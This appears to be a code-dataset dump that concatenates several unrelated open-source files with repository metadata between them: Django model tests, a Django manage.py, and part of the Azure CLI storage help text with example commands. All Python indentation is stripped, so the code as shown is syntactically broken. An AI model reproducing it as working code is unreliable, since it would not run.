fk_a = models.ForeignKey(A02)
f_a = models.CharField(max_length=10, db_index=True)
f_b = models.IntegerField()
def __unicode__(self):
return self.f_a
# To re-use the many-to-many intermediate table, we need to manually set up
# things up.
class C02(models.Model):
mm_a = models.ManyToManyField(A02, through="Intermediate")
f_a = models.CharField(max_length=10, db_index=True)
f_b = models.IntegerField()
class Meta:
db_table = 'C01'
managed = False
def __unicode__(self):
return self.f_a
class Intermediate(models.Model):
a02 = models.ForeignKey(A02, db_column="a01_id")
c02 = models.ForeignKey(C02, db_column="c01_id")
class Meta:
db_table = 'D01'
managed = False
#
# These next models test the creation (or not) of many to many join tables
# between managed and unmanaged models. A join table between two unmanaged
# models shouldn't be automatically created (see #10647).
#
# Firstly, we need some models that will create the tables, purely so that the
# tables are created. This is a test setup, not a requirement for unmanaged
# models.
class Proxy1(models.Model):
class Meta:
db_table = "unmanaged_models_proxy1"
class Proxy2(models.Model):
class Meta:
db_table = "unmanaged_models_proxy2"
class Unmanaged1(models.Model):
class Meta:
managed = False
db_table = "unmanaged_models_proxy1"
# Unmanged with an m2m to unmanaged: the intermediary table won't be created.
class Unmanaged2(models.Model):
mm = models.ManyToManyField(Unmanaged1)
class Meta:
managed = False
db_table = "unmanaged_models_proxy2"
# Here's an unmanaged model with an m2m to a managed one; the intermediary
# table *will* be created (unless given a custom `through` as for C02 above).
class Managed1(models.Model):
mm = models.ManyToManyField(Unmanaged1)
| 27.587302 | 79 | 0.686421 |
789fe3d9ed9df615d7efd0662fc6ed5d9a1a6442 | 2,741 | py | Python | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 5 | 2015-08-24T10:00:48.000Z | 2020-04-18T07:10:50.000Z | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 2 | 2017-12-28T21:36:48.000Z | 2017-12-28T21:36:57.000Z | src/utils/idmapper/tests.py | reddcoin-project/ReddConnect | 5c212683de6b80b81fd15ed05239c3a1b46c3afd | [
"BSD-3-Clause"
] | 2 | 2019-09-29T01:32:26.000Z | 2021-07-13T07:13:55.000Z | from django.test import TestCase
from base import SharedMemoryModel
from django.db import models
class Category(SharedMemoryModel):
name = models.CharField(max_length=32)
class RegularCategory(models.Model):
name = models.CharField(max_length=32)
class Article(SharedMemoryModel):
name = models.CharField(max_length=32)
category = models.ForeignKey(Category)
category2 = models.ForeignKey(RegularCategory)
class RegularArticle(models.Model):
name = models.CharField(max_length=32)
category = models.ForeignKey(Category)
category2 = models.ForeignKey(RegularCategory)
class SharedMemorysTest(TestCase):
# TODO: test for cross model relation (singleton to regular)
def setUp(self):
n = 0
category = Category.objects.create(name="Category %d" % (n,))
regcategory = RegularCategory.objects.create(name="Category %d" % (n,))
for n in xrange(0, 10):
Article.objects.create(name="Article %d" % (n,), category=category, category2=regcategory)
RegularArticle.objects.create(name="Article %d" % (n,), category=category, category2=regcategory)
def testSharedMemoryReferences(self):
article_list = Article.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category is last_article.category, True)
last_article = article
def testRegularReferences(self):
article_list = RegularArticle.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category2 is last_article.category2, False)
last_article = article
def testMixedReferences(self):
article_list = RegularArticle.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category is last_article.category, True)
last_article = article
article_list = Article.objects.all().select_related('category')
last_article = article_list[0]
for article in article_list[1:]:
self.assertEquals(article.category2 is last_article.category2, False)
last_article = article
def testObjectDeletion(self):
# This must execute first so its guaranteed to be in memory.
article_list = list(Article.objects.all().select_related('category'))
article = Article.objects.all()[0:1].get()
pk = article.pk
article.delete()
self.assertEquals(pk not in Article.__instance_cache__, True)
| 39.157143 | 109 | 0.680409 |
8d4ee6524d65e8e3e9c85747ea1a22e8ed346ff9 | 265 | py | Python | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | manage.py | Mohammad-Kabajah/django_project | 6598668dbc4f8d777ccf716464d259c49d881cd8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project_name.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 24.090909 | 77 | 0.74717 |
cc10d218140090c05fe0605c38f3bf69e6dfa278 | 108,892 | py | Python | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | src/azure-cli/azure/cli/command_modules/storage/_help.py | nexxai/azure-cli | 3f24ada49f3323d9310d46ccc1025dc99fc4cf8e | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps # pylint: disable=unused-import
# pylint: disable=line-too-long, too-many-lines
helps['storage'] = """
type: group
short-summary: Manage Azure Cloud Storage resources.
"""
helps['storage account'] = """
type: group
short-summary: Manage storage accounts.
"""
helps['storage account blob-service-properties'] = """
type: group
short-summary: Manage the properties of a storage account's blob service.
"""
helps['storage account blob-service-properties show'] = """
type: command
short-summary: Show the properties of a storage account's blob service.
long-summary: >
Show the properties of a storage account's blob service, including
properties for Storage Analytics and CORS (Cross-Origin Resource
Sharing) rules.
examples:
- name: Show the properties of the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties show -n mystorageaccount -g MyResourceGroup
"""
helps['storage account blob-service-properties update'] = """
type: command
short-summary: Update the properties of a storage account's blob service.
long-summary: >
Update the properties of a storage account's blob service, including
properties for Storage Analytics and CORS (Cross-Origin Resource
Sharing) rules.
parameters:
- name: --enable-change-feed
short-summary: 'Indicate whether change feed event logging is enabled. If it is true, you enable the storage account to begin capturing changes. The default value is true. You can see more details in https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-change-feed?tabs=azure-portal#register-by-using-azure-cli'
- name: --enable-delete-retention
short-summary: 'Indicate whether delete retention policy is enabled for the blob service.'
- name: --delete-retention-days
short-summary: 'Indicate the number of days that the deleted blob should be retained. The value must be in range [1,365]. It must be provided when `--enable-delete-retention` is true.'
examples:
- name: Enable the change feed for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-change-feed true -n mystorageaccount -g MyResourceGroup
- name: Enable delete retention policy and set delete retention days to 100 for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-delete-retention true --delete-retention-days 100 -n mystorageaccount -g MyResourceGroup
- name: Enable versioning for the storage account 'mystorageaccount' in resource group 'MyResourceGroup'.
text: az storage account blob-service-properties update --enable-versioning -n mystorageaccount -g MyResourceGroup
"""
helps['storage account create'] = """
type: command
short-summary: Create a storage account.
long-summary: >
The SKU of the storage account defaults to 'Standard_RAGRS'.
examples:
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n mystorageaccount -g MyResourceGroup -l westus --sku Standard_LRS
unsupported-profiles: 2017-03-09-profile
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n mystorageaccount -g MyResourceGroup -l westus --account-type Standard_LRS
supported-profiles: 2017-03-09-profile
- name: Create a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the eastus2euap region with account-scoped encryption key enabled for Table Service.
text: az storage account create -n mystorageaccount -g MyResourceGroup --kind StorageV2 -l eastus2euap -t Account
"""
helps['storage account delete'] = """
type: command
short-summary: Delete a storage account.
examples:
- name: Delete a storage account using a resource ID.
text: az storage account delete --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Delete a storage account using an account name and resource group.
text: az storage account delete -n MyStorageAccount -g MyResourceGroup
"""
helps['storage account encryption-scope'] = """
type: group
short-summary: Manage encryption scope for a storage account.
"""
helps['storage account encryption-scope create'] = """
type: command
short-summary: Create an encryption scope within storage account.
examples:
- name: Create an encryption scope within storage account based on Micosoft.Storage key source.
text: |
az storage account encryption-scope create --name myencryption -s Microsoft.Storage --account-name mystorageaccount -g MyResourceGroup
- name: Create an encryption scope within storage account based on Micosoft.KeyVault key source.
text: |
az storage account encryption-scope create --name myencryption -s Microsoft.KeyVault -u "https://vaultname.vault.azure.net/keys/keyname/1f7fa7edc99f4cdf82b5b5f32f2a50a7" --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope list'] = """
type: command
short-summary: List encryption scopes within storage account.
examples:
- name: List encryption scopes within storage account.
text: |
az storage account encryption-scope list --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope show'] = """
type: command
short-summary: Show properties for specified encryption scope within storage account.
examples:
- name: Show properties for specified encryption scope within storage account.
text: |
az storage account encryption-scope show --name myencryption --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account encryption-scope update'] = """
type: command
short-summary: Update properties for specified encryption scope within storage account.
examples:
- name: Update an encryption scope key source to Micosoft.Storage.
text: |
az storage account encryption-scope update --name myencryption -s Microsoft.Storage --account-name mystorageaccount -g MyResourceGroup
- name: Create an encryption scope within storage account based on Micosoft.KeyVault key source.
text: |
az storage account encryption-scope update --name myencryption -s Microsoft.KeyVault -u "https://vaultname.vault.azure.net/keys/keyname/1f7fa7edc99f4cdf82b5b5f32f2a50a7" --account-name mystorageaccount -g MyResourceGroup
- name: Disable an encryption scope within storage account.
text: |
az storage account encryption-scope update --name myencryption --state Disabled --account-name mystorageaccount -g MyResourceGroup
- name: Enable an encryption scope within storage account.
text: |
az storage account encryption-scope update --name myencryption --state Enabled --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account failover'] = """
type: command
short-summary: Failover request can be triggered for a storage account in case of availability issues.
long-summary: |
The failover occurs from the storage account's primary cluster to secondary cluster for (RA-)GRS/GZRS accounts. The secondary
cluster will become primary after failover. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/common/storage-disaster-recovery-guidance.
examples:
- name: Failover a storage account.
text: |
az storage account failover -n mystorageaccount -g MyResourceGroup
- name: Failover a storage account without waiting for complete.
text: |
az storage account failover -n mystorageaccount -g MyResourceGroup --no-wait
az storage account show -n mystorageaccount --expand geoReplicationStats
"""
helps['storage account generate-sas'] = """
type: command
parameters:
- name: --services
short-summary: 'The storage services the SAS is applicable for. Allowed values: (b)lob (f)ile (q)ueue (t)able. Can be combined.'
- name: --resource-types
short-summary: 'The resource types the SAS is applicable for. Allowed values: (s)ervice (c)ontainer (o)bject. Can be combined.'
- name: --expiry
short-summary: Specifies the UTC datetime (Y-m-d'T'H:M'Z') at which the SAS becomes invalid.
- name: --start
short-summary: Specifies the UTC datetime (Y-m-d'T'H:M'Z') at which the SAS becomes valid. Defaults to the time of the request.
- name: --account-name
short-summary: 'Storage account name. Must be used in conjunction with either storage account key or a SAS token. Environment Variable: AZURE_STORAGE_ACCOUNT'
examples:
- name: Generate a sas token for the account that is valid for queue and table services on Linux.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage account generate-sas --permissions cdlruwap --account-name MyStorageAccount --services qt --resource-types sco --expiry $end -o tsv
- name: Generate a sas token for the account that is valid for queue and table services on MacOS.
text: |
end=`date -v+30M '+%Y-%m-%dT%H:%MZ'`
az storage account generate-sas --permissions cdlruwap --account-name MyStorageAccount --services qt --resource-types sco --expiry $end -o tsv
- name: Generate a shared access signature for the account (autogenerated)
text: |
az storage account generate-sas --account-key 00000000 --account-name MyStorageAccount --expiry 2020-01-01 --https-only --permissions acuw --resource-types co --services bfqt
crafted: true
"""
helps['storage account file-service-properties'] = """
type: group
short-summary: Manage the properties of file service in storage account.
"""
helps['storage account file-service-properties show'] = """
type: command
short-summary: Show the properties of file service in storage account.
long-summary: >
Show the properties of file service in storage account.
examples:
- name: Show the properties of file service in storage account.
text: az storage account file-service-properties show -n mystorageaccount -g MyResourceGroup
"""
helps['storage account file-service-properties update'] = """
type: command
short-summary: Update the properties of file service in storage account.
long-summary: >
Update the properties of file service in storage account.
examples:
- name: Enable soft delete policy and set delete retention days to 100 for file service in storage account.
text: az storage account file-service-properties update --enable-delete-retention true --delete-retention-days 100 -n mystorageaccount -g MyResourceGroup
- name: Disable soft delete policy for file service.
text: az storage account file-service-properties update --enable-delete-retention false -n mystorageaccount -g MyResourceGroup
"""
helps['storage account keys'] = """
type: group
short-summary: Manage storage account keys.
"""
helps['storage account keys list'] = """
type: command
short-summary: List the access keys or Kerberos keys (if active directory enabled) for a storage account.
examples:
- name: List the access keys for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount
- name: List the access keys and Kerberos keys (if active directory enabled) for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount --expand-key-type kerb
"""
helps['storage account keys renew'] = """
type: command
short-summary: Regenerate one of the access keys or Kerberos keys (if active directory enabled) for a storage account.
long-summary: >
Kerberos key is generated per storage account for Azure Files identity based authentication either with
Azure Active Directory Domain Service (Azure AD DS) or Active Directory Domain Service (AD DS). It is used as the
password of the identity registered in the domain service that represents the storage account. Kerberos key does not
provide access permission to perform any control or data plane read or write operations against the storage account.
examples:
- name: Regenerate one of the access keys for a storage account.
text: az storage account keys renew -g MyResourceGroup -n MyStorageAccount --key primary
- name: Regenerate one of the Kerberos keys for a storage account.
text: az storage account keys renew -g MyResourceGroup -n MyStorageAccount --key secondary --key-type kerb
"""
helps['storage account list'] = """
type: command
short-summary: List storage accounts.
examples:
- name: List all storage accounts in a subscription.
text: az storage account list
- name: List all storage accounts in a resource group.
text: az storage account list -g MyResourceGroup
"""
helps['storage account management-policy'] = """
type: group
short-summary: Manage storage account management policies.
"""
helps['storage account management-policy create'] = """
type: command
short-summary: Creates the data policy rules associated with the specified storage account.
"""
helps['storage account management-policy update'] = """
type: command
short-summary: Updates the data policy rules associated with the specified storage account.
"""
helps['storage account network-rule'] = """
type: group
short-summary: Manage network rules.
"""
helps['storage account network-rule add'] = """
type: command
short-summary: Add a network rule.
long-summary: >
Rules can be created for an IPv4 address, address range (CIDR format), or a virtual network subnet.
examples:
- name: Create a rule to allow a specific address-range.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --ip-address 23.45.1.0/24
- name: Create a rule to allow access for a subnet.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --vnet-name myvnet --subnet mysubnet
- name: Create a rule to allow access for a subnet in another resource group.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --subnet $subnetId
"""
helps['storage account network-rule list'] = """
type: command
short-summary: List network rules.
examples:
- name: List network rules. (autogenerated)
text: |
az storage account network-rule list --account-name MyAccount --resource-group MyResourceGroup
crafted: true
"""
helps['storage account network-rule remove'] = """
type: command
short-summary: Remove a network rule.
examples:
- name: Remove a network rule. (autogenerated)
text: |
az storage account network-rule remove --account-name MyAccount --resource-group MyResourceGroup --subnet MySubnetID
crafted: true
- name: Remove a network rule. (autogenerated)
text: |
az storage account network-rule remove --account-name MyAccount --ip-address 23.45.1.0/24 --resource-group MyResourceGroup
crafted: true
"""
helps['storage account or-policy'] = """
type: group
short-summary: Manage storage account Object Replication Policy.
"""
helps['storage account or-policy create'] = """
type: command
short-summary: Create Object Replication Service Policy for storage account.
examples:
- name: Create Object Replication Service Policy for storage account.
text: az storage account or-policy create -g ResourceGroupName -n storageAccountName -d destAccountName -s srcAccountName --destination-container dcont --source-container scont
- name: Create Object Replication Service Policy trough json file for storage account.
text: az storage account or-policy create -g ResourceGroupName -n storageAccountName --policy @policy.json
- name: Create Object Replication Service Policy to source storage account through policy associated with destination storage account.
text: az storage account or-policy show -g ResourceGroupName -n destAccountName --policy-id "3496e652-4cea-4581-b2f7-c86b3971ba92" | az storage account or-policy create -g ResourceGroupName -n srcAccountName -p "@-"
"""
helps['storage account or-policy list'] = """
type: command
short-summary: List Object Replication Service Policies associated with the specified storage account.
examples:
- name: List Object Replication Service Policies associated with the specified storage account.
text: az storage account or-policy list -g ResourceGroupName -n StorageAccountName
"""
helps['storage account or-policy delete'] = """
type: command
short-summary: Delete specified Object Replication Service Policy associated with the specified storage account.
examples:
- name: Delete Object Replication Service Policy associated with the specified storage account.
text: az storage account or-policy delete -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy show'] = """
type: command
short-summary: Show the properties of specified Object Replication Service Policy for storage account.
examples:
- name: Show the properties of specified Object Replication Service Policy for storage account.
text: az storage account or-policy show -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy update'] = """
type: command
short-summary: Update Object Replication Service Policy properties for storage account.
examples:
- name: Update source storage account in Object Replication Service Policy.
text: az storage account or-policy update -g ResourceGroupName -n StorageAccountName --source-account newSourceAccount --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
- name: Update Object Replication Service Policy through json file.
text: az storage account or-policy update -g ResourceGroupName -n StorageAccountName -p @policy.json
"""
helps['storage account or-policy rule'] = """
type: group
short-summary: Manage Object Replication Service Policy Rules.
"""
helps['storage account or-policy rule add'] = """
type: command
short-summary: Add rule to the specified Object Replication Service Policy.
examples:
- name: Add rule to the specified Object Replication Service Policy.
text: az storage account or-policy rule add -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" -d destContainer -s srcContainer
"""
helps['storage account or-policy rule list'] = """
type: command
short-summary: List all the rules in the specified Object Replication Service Policy.
examples:
- name: List all the rules in the specified Object Replication Service Policy.
text: az storage account or-policy rule list -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8"
"""
helps['storage account or-policy rule remove'] = """
type: command
short-summary: Remove the specified rule from the specified Object Replication Service Policy.
examples:
- name: Remove the specified rule from the specified Object Replication Service Policy.
text: az storage account or-policy rule remove -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332"
"""
helps['storage account or-policy rule show'] = """
type: command
short-summary: Show the properties of specified rule in Object Replication Service Policy.
examples:
- name: Show the properties of specified rule in Object Replication Service Policy.
text: az storage account or-policy rule show -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332"
"""
helps['storage account or-policy rule update'] = """
type: command
short-summary: Update rule properties to Object Replication Service Policy.
examples:
- name: Update rule properties to Object Replication Service Policy.
text: az storage account or-policy rule update -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332" --prefix-match blobA blobB
"""
helps['storage account private-endpoint-connection'] = """
type: group
short-summary: Manage storage account private endpoint connection.
"""
helps['storage account private-endpoint-connection approve'] = """
type: command
short-summary: Approve a private endpoint connection request for storage account.
examples:
- name: Approve a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection approve --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Approve a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection approve --id $id
- name: Approve a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection approve -g myRg --account-name mystorageaccount --name myconnection
- name: Approve a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection approve -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection delete'] = """
type: command
short-summary: Delete a private endpoint connection request for storage account.
examples:
- name: Delete a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection delete --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Delete a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection delete --id $id
- name: Delete a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection delete -g myRg --account-name mystorageaccount --name myconnection
- name: Delete a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection delete -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection reject'] = """
type: command
short-summary: Reject a private endpoint connection request for storage account.
examples:
- name: Reject a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection reject --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Reject a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection reject --id $id
- name: Reject a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection reject -g myRg --account-name mystorageaccount --name myconnection
- name: Reject a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection reject -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection show'] = """
type: command
short-summary: Show details of a private endpoint connection request for storage account.
examples:
- name: Show details of a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection show --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Show details of a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection show --id $id
- name: Show details of a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection show -g myRg --account-name mystorageaccount --name myconnection
- name: Show details of a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection show -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-link-resource'] = """
type: group
short-summary: Manage storage account private link resources.
"""
helps['storage account private-link-resource list'] = """
type: command
short-summary: Get the private link resources that need to be created for a storage account.
examples:
- name: Get the private link resources that need to be created for a storage account.
text: |
az storage account private-link-resource list --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account revoke-delegation-keys'] = """
type: command
short-summary: Revoke all user delegation keys for a storage account.
examples:
- name: Revoke all user delegation keys for a storage account by resource ID.
text: az storage account revoke-delegation-keys --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Revoke all user delegation keys for a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account revoke-delegation-keys -n mystorageaccount -g MyResourceGroup
"""
helps['storage account show'] = """
type: command
short-summary: Show storage account properties.
examples:
- name: Show properties for a storage account by resource ID.
text: az storage account show --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Show properties for a storage account using an account name and resource group.
text: az storage account show -g MyResourceGroup -n MyStorageAccount
"""
helps['storage account show-connection-string'] = """
type: command
short-summary: Get the connection string for a storage account.
examples:
- name: Get a connection string for a storage account.
text: az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount
- name: Get the connection string for a storage account. (autogenerated)
text: |
az storage account show-connection-string --name MyStorageAccount --resource-group MyResourceGroup --subscription MySubscription
crafted: true
"""
helps['storage account show-usage'] = """
type: command
short-summary: Show the current count and limit of the storage accounts under the subscription.
examples:
- name: Show the current count and limit of the storage accounts under the subscription. (autogenerated)
text: |
az storage account show-usage --location westus2
crafted: true
"""
helps['storage account update'] = """
type: command
short-summary: Update the properties of a storage account.
examples:
- name: Update the properties of a storage account. (autogenerated)
text: |
az storage account update --default-action Allow --name MyStorageAccount --resource-group MyResourceGroup
crafted: true
"""
helps['storage blob'] = """
type: group
short-summary: Manage object storage for unstructured data (blobs).
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage blob copy'] = """
type: group
short-summary: Manage blob copy operations. Use `az storage blob show` to check the status of the blobs.
"""
helps['storage blob copy start'] = """
type: command
short-summary: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs.
parameters:
- name: --source-uri -u
type: string
short-summary: >
A URL of up to 2 KB in length that specifies an Azure file or blob.
The value should be URL-encoded as it would appear in a request URI.
If the source is in another account, the source must either be public
or must be authenticated via a shared access signature. If the source
is public, no authentication is required.
Examples:
`https://myaccount.blob.core.windows.net/mycontainer/myblob`,
`https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>`,
`https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken`
examples:
- name: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs. (autogenerated)
text: |
az storage blob copy start --account-key 00000000 --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --source-uri https://storage.blob.core.windows.net/photos
crafted: true
- name: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs (autogenerated)
text: |
az storage blob copy start --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --sas-token $sas --source-uri https://storage.blob.core.windows.net/photos
crafted: true
"""
helps['storage blob copy start-batch'] = """
type: command
short-summary: Copy multiple blobs to a blob container. Use `az storage blob show` to check the status of the blobs.
parameters:
- name: --destination-container -c
type: string
short-summary: The blob container where the selected source files or blobs will be copied to.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files or blobs to be uploaded. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account from which the files or blobs are copied to the destination. If omitted, the source account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account.
- name: --source-container
type: string
short-summary: The source container from which blobs are copied.
- name: --source-share
type: string
short-summary: The source share from which files are copied.
- name: --source-uri
type: string
short-summary: A URI specifying a file share or blob container from which the files or blobs are copied.
long-summary: If the source is in another account, the source must either be public or be authenticated by using a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
examples:
- name: Copy multiple blobs to a blob container. Use `az storage blob show` to check the status of the blobs. (autogenerated)
text: |
az storage blob copy start-batch --account-key 00000000 --account-name MyAccount --destination-container MyDestinationContainer --source-account-key MySourceKey --source-account-name MySourceAccount --source-container MySourceContainer
crafted: true
"""
helps['storage blob delete'] = """
type: command
short-summary: Mark a blob or snapshot for deletion.
long-summary: >
The blob is marked for later deletion during garbage collection. In order to delete a blob, all of its snapshots must also be deleted.
Both can be removed at the same time.
examples:
- name: Delete a blob.
text: az storage blob delete -c mycontainer -n MyBlob
- name: Delete a blob using login credentials.
text: az storage blob delete -c mycontainer -n MyBlob --account-name mystorageaccount --auth-mode login
"""
helps['storage blob delete-batch'] = """
type: command
short-summary: Delete blobs from a blob container recursively.
parameters:
- name: --source -s
type: string
short-summary: The blob container from where the files will be deleted.
long-summary: The source can be the container URL or the container name. When the source is the container URL, the storage account name will be parsed from the URL.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'. You can also try "az stroage remove" command with --include and --exclude with azure cli >= 2.0.70 to match multiple patterns.
- name: --dryrun
type: bool
short-summary: Show the summary of the operations to be taken instead of actually deleting the file(s).
long-summary: If this is specified, it will ignore all the Precondition Arguments that include --if-modified-since and --if-unmodified-since. So the file(s) will be deleted with the command without --dryrun may be different from the result list with --dryrun flag on.
- name: --if-match
type: string
short-summary: An ETag value, or the wildcard character (*). Specify this header to perform the operation only if the resource's ETag matches the value specified.
- name: --if-none-match
type: string
short-summary: An ETag value, or the wildcard character (*).
